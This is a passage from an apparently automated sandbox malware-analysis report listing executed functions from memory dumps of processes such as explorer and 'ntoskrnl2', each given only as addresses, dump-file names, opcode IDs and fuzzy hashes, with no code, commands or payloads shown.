                                                              • Opcode Fuzzy Hash: 297842779df3f934e7ce00bfca479be4166b8696bd687055b9d5075be398b442
                                                              • Instruction Fuzzy Hash: 1CE02621B5C81907DB7CB5B468B12F17280DB4A618B05017AD01AC3282CC1D5C818281
                                                              Function 00007FFD34314D19 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.3605664292.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd34310000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                              • Instruction ID: 57e66128805efbe68af01c42634f20d9939dd33dfb518122a16e1d32f5aa6379
                                                              • Opcode Fuzzy Hash: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                              • Instruction Fuzzy Hash: 0EE0ED20B4801A46FB64B544C8A0BB86290EB4E300F1041B4DA4EE32C1CD3CAE45EB55
                                                              Function 00007FFD34312759 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.3605664292.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd34310000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1c020703e54b54e3b188db8ce449cba95cf2faac2895e34bca5a06e88b04ad7
                                                              • Instruction ID: 3d0aff3558a3801e3f750c97c4ec55503ea4df173992c66d64fbdc3993fcd920
                                                              • Opcode Fuzzy Hash: f1c020703e54b54e3b188db8ce449cba95cf2faac2895e34bca5a06e88b04ad7
                                                              • Instruction Fuzzy Hash: 73D0C771E5C5554BDB91E908C4E47597791FB59340F1542E5D80CE3247C639EE81FB40
                                                              Function 00007FFD34311765 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.3605664292.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd34310000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                              • Instruction ID: 1c9cf5fac5d8172267512b44e27baa82cd5f270016968f4cf4564691329d849c
                                                              • Opcode Fuzzy Hash: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                              • Instruction Fuzzy Hash: BDC08C38655808CFC908FB2DC88890833B0FB0F304BD200A0E10DC7271D629DCC2D781
                                                              Function 00007FFD34310705 Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.3605664292.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd34310000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                              • Instruction ID: fa8ec00066e9e00c4be34718b80e61ec940e469dcdf401058b085996d0ffd569
                                                              • Opcode Fuzzy Hash: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                              • Instruction Fuzzy Hash: 7AC08C00FCA80A00A921312A24E60ECA1209BCF210FD01032D30CC2481AC7D2086A592
                                                              Function 00007FFD34310728 Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.3605664292.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd34310000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                              • Instruction ID: 588aafe86a0c45c30edff887fde012fc6bed75a6f9aee07329de2305f253b40e
                                                              • Opcode Fuzzy Hash: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                              • Instruction Fuzzy Hash: 4BB01200DD680E009914317528D70A474005B8F100FC01170D608C1082D8AD10956292

                                                              Executed Functions

                                                              Function 00007FFD342F0A19 Relevance: .3, Instructions: 283COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 28f9d97aafb7d8b93a048860a51537ed8a955dd610d01971e16ccba5ba587732
                                                              • Instruction ID: 372c739522678588fce1c695c9f0a2de7317d9cbc39064583bd9bcf2ae2311ef
                                                              • Opcode Fuzzy Hash: 28f9d97aafb7d8b93a048860a51537ed8a955dd610d01971e16ccba5ba587732
                                                              • Instruction Fuzzy Hash: A971672AB2DA4A4AE768667C48A53B976C2EF8B311F65023DD5DFC32C3EC1D68075240
                                                              Function 00007FFD342F1A0D Relevance: .2, Instructions: 233COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0e449ec05b7a57350d40eb868d5367bd01a8ef4c67025d1047bbdbda25cf8a10
                                                              • Instruction ID: 857a59d4290c6b7233920fe002e8a221a0185c0f39719d812caf2365a2a89713
                                                              • Opcode Fuzzy Hash: 0e449ec05b7a57350d40eb868d5367bd01a8ef4c67025d1047bbdbda25cf8a10
                                                              • Instruction Fuzzy Hash: 94810776A0C69A8FE751DBA8D4B52F97FE0EF52314F4801BBC088EB193DE296805C741
                                                              Function 00007FFD342F083D Relevance: .2, Instructions: 187COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5429d5187040d2cb17d0a21a90f919575a15cad895658b3f6526fdc6c5be6895
                                                              • Instruction ID: ebab457f4544b546a6d36f9c0c45083dd934d0e4bbd91f23c801fa9ad4dcb65f
                                                              • Opcode Fuzzy Hash: 5429d5187040d2cb17d0a21a90f919575a15cad895658b3f6526fdc6c5be6895
                                                              • Instruction Fuzzy Hash: 2D514D37F0CA588FD7A0DB3CC4A56BA77E0FF49311B45417AE589D7292DE28A8418741
                                                              Function 00007FFD343023EB Relevance: .1, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd34300000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9ce987a8cc82716513e7a62a366070bfec940f1917e3ba083b7b056e433125f
                                                              • Instruction ID: 39ff11acab10a7e2f26d331f1d9f02c12285f25e3bc2e5fc3ff9bae0cbfc25c2
                                                              • Opcode Fuzzy Hash: b9ce987a8cc82716513e7a62a366070bfec940f1917e3ba083b7b056e433125f
                                                              • Instruction Fuzzy Hash: C641057680E7C55FE7079B705CA21A57FB0EF03224B0902EBC5C5CB4A3E52DA91AC362
                                                              Function 00007FFD342F1C45 Relevance: .1, Instructions: 124COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: febaf1737d430a554861343c2b4b7df614e3df59f3b8518d785d32e14398347b
                                                              • Instruction ID: 647778b60bc4edf8f0a617620b7f23dfbd41a4d0c96fa92ad11f1855fecdad1d
                                                              • Opcode Fuzzy Hash: febaf1737d430a554861343c2b4b7df614e3df59f3b8518d785d32e14398347b
                                                              • Instruction Fuzzy Hash: C1418D72A04A4D8FF798DF58D4A93F97BE1EB55300F9041BED009E73E2DAB928458740
                                                              Function 00007FFD34302430 Relevance: .1, Instructions: 105COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd34300000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 779e5a4157b85dd33f606f571321f6a6cffe20841066ae93373cf91c452d56ac
                                                              • Instruction ID: 5ca10a46348bb7a7823c3717e28ba42adf98df9474eafba20daa31070862c5d2
                                                              • Opcode Fuzzy Hash: 779e5a4157b85dd33f606f571321f6a6cffe20841066ae93373cf91c452d56ac
                                                              • Instruction Fuzzy Hash: 5E31ABA680E7C15FE7074B701CB21957F709F13264B1E02EBC995CB0E7E92C980AD362
                                                              Function 00007FFD342F155D Relevance: .1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 590a54dbbd214161b9afd7cbced93cfba6f6c95dafab867aada1a9d77c4deec9
                                                              • Instruction ID: 7d12c2282209d00777b4d718509aaf95839ea01e51319ee78f197c11b6dc6e6b
                                                              • Opcode Fuzzy Hash: 590a54dbbd214161b9afd7cbced93cfba6f6c95dafab867aada1a9d77c4deec9
                                                              • Instruction Fuzzy Hash: C6310836B0C2998FE701FBB8D8612ECBBB0EF12321F9441B7C254D7182DA396949C791
                                                              Function 00007FFD342F12E8 Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e8f6e968c9ba4ff028fa72d66acb59d24e318443d32f526f062c3a9158cb563d
                                                              • Instruction ID: c66e47d58fdd76f5b5f16e94d63bc77cea26e30d38aef8d308ee21e1699bbe3c
                                                              • Opcode Fuzzy Hash: e8f6e968c9ba4ff028fa72d66acb59d24e318443d32f526f062c3a9158cb563d
                                                              • Instruction Fuzzy Hash: 9121D422B18A5D4FEB98E76C94A967577C6EF99311F9400BAE84DD33D3DC2DAC418280
                                                              Function 00007FFD342F0CB9 Relevance: .1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2707fd2ab75fafd9e5c85e1dcd91d00607ed63c2f16dfc354d687323772fd7fa
                                                              • Instruction ID: d5ce9e4cecb1506714109cd5c599681267e3efc26514e1f409b00e56f03ce450
                                                              • Opcode Fuzzy Hash: 2707fd2ab75fafd9e5c85e1dcd91d00607ed63c2f16dfc354d687323772fd7fa
                                                              • Instruction Fuzzy Hash: B7218457B0D7A646E379552C6CB12797BE2DF86200F9801BAE59AD22C3ED0EA8056380
                                                              Function 00007FFD342F0868 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1fa4734e0bd8bcba164bfcb0d741c052a104a0790609b715c8cf757cc80403b
                                                              • Instruction ID: 18bad7170d428ab4d5193847c6e16afa77321b1015f6f98196c4d288480c1449
                                                              • Opcode Fuzzy Hash: e1fa4734e0bd8bcba164bfcb0d741c052a104a0790609b715c8cf757cc80403b
                                                              • Instruction Fuzzy Hash: 74115736A5C7888FDB61AB3888595EA7BE0FF4A315F00053FE88AD3281DA3494008782
                                                              Function 00007FFD342F1588 Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fe161c7de4bf84213ece0fccc8a5824df074efe3c7b9a0e806356c1d0253e362
                                                              • Instruction ID: a501c6b927462df0f4493ad78ae8168303f5456dfd9463b928d5debb1334989b
                                                              • Opcode Fuzzy Hash: fe161c7de4bf84213ece0fccc8a5824df074efe3c7b9a0e806356c1d0253e362
                                                              • Instruction Fuzzy Hash: BB11A536B0C7998FE702EBB4C8611DDBBB0EF46311F5941B7C154D7192EA386A49C781
                                                              Function 00007FFD342F1E1D Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7f9ccba95abe62e8de728635aa446036fc105b79ae053c6ec51fc54b9b2f2ac9
                                                              • Instruction ID: 7f339ad5e5d1eddced669bbfb663290e9f82ab284b9ca67e2fa2e775a3bcddcb
                                                              • Opcode Fuzzy Hash: 7f9ccba95abe62e8de728635aa446036fc105b79ae053c6ec51fc54b9b2f2ac9
                                                              • Instruction Fuzzy Hash: D101442198D6C64FD31A5BB08C706F23BE5CF8B21074901FAD089CB0A3CC0E5C82C3A1
                                                              Function 00007FFD342F1590 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e6fc706eaa28e6490447ca285280084bdaa9bdac07e91aac9bb86cc0604ef71c
                                                              • Instruction ID: ff48d8c2116a389e28b58b3b8f260ce6fd2cfadcd0603516a28780568d74ce05
                                                              • Opcode Fuzzy Hash: e6fc706eaa28e6490447ca285280084bdaa9bdac07e91aac9bb86cc0604ef71c
                                                              • Instruction Fuzzy Hash: 90016135B096899FE702EBB4C8611DDBBB0EF46310F5541B6C154D7192EA386A49C741
                                                              Function 00007FFD342F1598 Relevance: .0, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d772212aa72ffbb0747cc0f486fc7a8bb338d70c70fba9cb08698f69ed73184
                                                              • Instruction ID: ece35b1cdd74bab1451815f8d190246e88027d4530708145db09aef0e0e7a250
                                                              • Opcode Fuzzy Hash: 5d772212aa72ffbb0747cc0f486fc7a8bb338d70c70fba9cb08698f69ed73184
                                                              • Instruction Fuzzy Hash: 95015E35A0D2899FD702EBB4C8A01ADBFB0AF07310F5941E6C144DB192EA39AA49C741
                                                              Function 00007FFD342F15A0 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1ee3b3318be0ca7453fafb6d80a0f53a76a42d7bd427554cc83314935841c1f5
                                                              • Instruction ID: c9e6fb91cfb77a05336338d055a2430ca866d86b8693f76ede3f33bb09f6e7a1
                                                              • Opcode Fuzzy Hash: 1ee3b3318be0ca7453fafb6d80a0f53a76a42d7bd427554cc83314935841c1f5
                                                              • Instruction Fuzzy Hash: 70014F35A0D289DFE702DBB484A41AD7FB0AF07314F9841E6C045DB192E9396A48D741
                                                              Function 00007FFD343046FB Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd34300000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55a103812637d333051b723dab04ec49f05019d8547d727c9092f8c9ad90b79e
                                                              • Instruction ID: 2d2d082ccadcb162212547324c6a3c6655cc7029ff170a067e00b327f838a41f
                                                              • Opcode Fuzzy Hash: 55a103812637d333051b723dab04ec49f05019d8547d727c9092f8c9ad90b79e
                                                              • Instruction Fuzzy Hash: 61F0BE31B4C50B8BE719BB0C98E02B93290EF66700F144275DA1FC32C7EE3DE942A685
                                                              Function 00007FFD342F1E50 Relevance: .0, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 32916f436f62474788f6c34225e285d05df95efbd8e2ac23baf904b442d3ddce
                                                              • Instruction ID: 74cb46e671e87f2d27fca94c3a2de16eef05aef9c30fae32bd034c10c135161d
                                                              • Opcode Fuzzy Hash: 32916f436f62474788f6c34225e285d05df95efbd8e2ac23baf904b442d3ddce
                                                              • Instruction Fuzzy Hash: D8E02625B5CC190BDB7CA9B468712B07380DF49218B4501BAD05AC22C3CC0E5C818280
                                                              Function 00007FFD34305108 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd34300000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 32ba93301b27e784eb2fb684687259cc95d823aec9c9ea40065ac09acac1121f
                                                              • Instruction ID: 7e6a8b05804f9d2e63b0184f1c2793d6b5d019f3b615d72a256aee782b865620
                                                              • Opcode Fuzzy Hash: 32ba93301b27e784eb2fb684687259cc95d823aec9c9ea40065ac09acac1121f
                                                              • Instruction Fuzzy Hash: 00D05E30B609094B8B4CB62D8459431B3D1EBAA2067D46278940BC3285ED29ECC6CB84
                                                              Function 00007FFD342F4D19 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                              • Instruction ID: 54a92ea8713e8f47f01fa6795ecc522907369551022cd261ec46de96f6c01f16
                                                              • Opcode Fuzzy Hash: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                              • Instruction Fuzzy Hash: 5DE01226F0802A86FB549584C8A0BB86250EF59300F9040B9DB4EF33C1CD3DAE45EB55
                                                              Function 00007FFD34303F7E Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd34300000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf64cc39b35e167b493e79910ee9ef2087524ae1bb00200a71c5373ccca2adc2
                                                              • Instruction ID: 9846f15bef348400a0603aa888031e2a7e0c13d4b773cec117e2d68b43fc407e
                                                              • Opcode Fuzzy Hash: cf64cc39b35e167b493e79910ee9ef2087524ae1bb00200a71c5373ccca2adc2
                                                              • Instruction Fuzzy Hash: FEE0B661E5461E8BE794EB94C8A86BD66B2FB58344F00063AD00EEB291DE382C018B41
                                                              Function 00007FFD342F2759 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 91c3cd49e5ec5995297b44fac8210c2f7b8a443ae5c903bb149213aca00019ef
                                                              • Instruction ID: 26b5ddb6a35389f8ab1e3f449b81a20379b854c48449ce54d80f1933929ce413
                                                              • Opcode Fuzzy Hash: 91c3cd49e5ec5995297b44fac8210c2f7b8a443ae5c903bb149213aca00019ef
                                                              • Instruction Fuzzy Hash: C7D0C776E195598BDB91C904C4E47987791FF59340F5542F5D80CE3242C63AEE81FB50
                                                              Function 00007FFD342F1765 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                              • Instruction ID: 04d1f5c987c48eaddb74f03021256823366f4f0b22b99d682052d99e1936fe10
                                                              • Opcode Fuzzy Hash: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                              • Instruction Fuzzy Hash: 6EC08C3861580CCFC908EB2DC89890837B0FF0B304BD200A0E10DC7271D21ADCC2D781
                                                              Function 00007FFD342F0705 Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                              • Instruction ID: 50e8b32d526d26fb05214072f7cc609a8ae39d2282440d944bd8eb793cdad308
                                                              • Opcode Fuzzy Hash: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                              • Instruction Fuzzy Hash: 8CC08C0FF0AC1AC0A92031AA18E60BCA2009FCA210FD000F2D30CE00C1AC0F24852982
                                                              Function 00007FFD342F0728 Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                              • Instruction ID: ed4996c480c138126ce251633160d3b22ece0c01a88eff0dfaad808388257bf6
                                                              • Opcode Fuzzy Hash: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                              • Instruction Fuzzy Hash: E2B01209D5680E40A91431F608D747474005F86100FC00170E608D00C2DC4F14942242
                                                              Function 00007FFD34305DBF Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.3704904943.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_7ffd34300000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 99c0cbb2557376d49d0aacbb3acc4d5c1c94a18e875f18da931712d202945757
                                                              • Instruction ID: bbfc70c11fd483a83ab42fb5642311c8c0cd59e430abc0cd1957407df4bf02c9
                                                              • Opcode Fuzzy Hash: 99c0cbb2557376d49d0aacbb3acc4d5c1c94a18e875f18da931712d202945757
                                                              • Instruction Fuzzy Hash: 96B09269B4815A8BE3A0AA0480A03AA21065F49300F108831D95F936C289AD680062AA

                                                              Executed Functions

                                                              Function 00007FFD34320BAC Relevance: 10.5, Strings: 7, Instructions: 1770COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34320000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0j=4$0n=4$X[=4$r<4$r<4$r<4$x=4
                                                              • API String ID: 0-1421023680
                                                              • Opcode ID: 074f02f4a3a844729ce2f642716286263a53ab160e79d62080188a996fe07005
                                                              • Instruction ID: 385025718864e4a02a841eaae3fe9d1cbd184b885be4b733a37f57c6cb1d4432
